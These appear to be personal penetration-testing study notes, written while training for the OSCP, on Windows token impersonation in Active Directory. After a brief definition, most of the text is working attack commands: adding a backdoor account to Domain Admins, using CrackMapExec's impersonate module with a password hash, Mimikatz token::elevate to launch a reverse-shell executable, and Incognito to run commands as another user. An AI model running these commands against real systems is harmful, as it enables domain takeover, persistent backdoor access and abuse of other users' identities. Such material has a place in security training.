<aside> 📌 Summary
</aside>
A token is a digital authentication credential that verifies a user's identity and grants access to resources or services. It contains user information, group memberships, and permissions.
Token impersonation is a security breach where an attacker exploits vulnerabilities to assume another user's token, acquiring their privileges. This enables unauthorized access to systems and data. Attackers can use techniques like token manipulation to escalate privileges, making it appear as if they are a legitimate user.
If you successfully connected as domain administrator, we might want to keep a backdoor by creating a domain administrator
net user /add hawkeye Passwor1@ /domain
net group "Domain Admins" hawkeye /ADD /DOMAIN
We can remotely impersonate with the impersonate module
cme smb 10.0.0.131 -u administrator -H <hash> --local-auth -M impersonate -o MODULE=list
cme smb 10.0.0.131 -u administrator -H <hash> --local-auth -M impersonate -o MODULE=exec TOKEN=2 EXEC=whoami
Using Mimikatz we’ll take a look a the token module.
First, we need to check privileges with privilege::debug.
Then we can start listing available tokens:
token::list
Among them we found some domain administrators
Then we can elevate privileges with the following:
token::elevate /domainadmin
token::run /process:"C:\\someReverseShell.exe"
Incognito is a tool that can be loaded with a meterpreter session. However, since I’m training for the OSCP let’s use the standalone version compiled by FSecureLab here https://github.com/FSecureLABS/incognito/.
From there, we can load the file on a target then run those commands
.\\incognito.exe list_tokens -u
.\\incognito.exe execute -c "domain\\user" C:\\Windows\\system32\\cmd.exe